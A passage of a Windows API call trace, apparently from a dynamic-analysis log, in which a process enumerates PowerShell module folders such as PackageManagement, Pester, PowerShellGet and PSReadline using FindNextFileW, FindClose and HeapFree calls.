ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Example3.Diagnostics", cAlternateFileName="EXAMPL~3.DIA")) returned 0 [0173.134] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0173.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0173.137] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e4074, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Modules", cAlternateFileName="")) returned 0 [0173.137] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0173.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.138] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e2971, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Test", cAlternateFileName="")) returned 0 [0173.138] FindClose (in: hFindFile=0x727748 | out: hFindFile=0x727748) returned 1 [0173.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.139] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50df8d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 0 [0173.139] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0173.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.140] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0173.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.142] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a56a3f4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5da012f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5da012f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0173.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.142] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb512ac95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0173.142] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0173.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.143] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Pester", cAlternateFileName="")) returned 1 [0173.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.143] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0173.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.178] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb51e4b40, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Examples", cAlternateFileName="")) returned 1 [0173.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.178] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb51e59c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Validator", cAlternateFileName="VALIDA~1")) returned 1 [0173.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.179] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb51e59c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Validator", cAlternateFileName="VALIDA~1")) returned 0 [0173.179] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0173.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.179] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb524b496, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0173.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.182] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e644ade, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e644ade, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e644ade, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2eca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Context.ps1", cAlternateFileName="")) returned 1 [0173.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.183] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0173.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.186] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb529cac5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Snippets", cAlternateFileName="")) returned 0 [0173.186] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.186] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb529e7f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 1 [0173.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.186] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f9693c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96f9693c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96f9693c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Build.bat", cAlternateFileName="")) returned 1 [0173.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.187] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb52a070b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Examples", cAlternateFileName="")) returned 1 [0173.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.187] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb52a1868, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Validator", cAlternateFileName="VALIDA~1")) returned 1 [0173.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.187] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb52a1868, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Validator", cAlternateFileName="VALIDA~1")) returned 0 [0173.187] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.187] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb531a14c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5dcb26, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0173.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.213] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f24202, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96f24202, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96f24202, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreakAndContinue.Tests.ps1", cAlternateFileName="")) returned 1 [0173.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.214] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97009075, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x97009075, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x97009075, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0173.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.215] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53e92f6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a64f261, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Snippets", cAlternateFileName="")) returned 0 [0173.215] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0173.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.215] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb529e7f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 0 [0173.215] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.230] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0173.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.251] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0173.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.251] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53ec4f8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0173.251] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0173.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0173.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.253] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0173.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.253] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 1 [0173.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.254] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x34e00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0173.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.254] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 0 [0173.254] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0173.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.254] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0173.254] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0173.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0173.256] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Modules", cAlternateFileName="")) returned 0 [0173.256] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0173.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0173.259] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb502b1c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0173.260] FindClose (in: hFindFile=0x727d48 | out: hFindFile=0x727d48) returned 1 [0173.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0173.261] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x11, 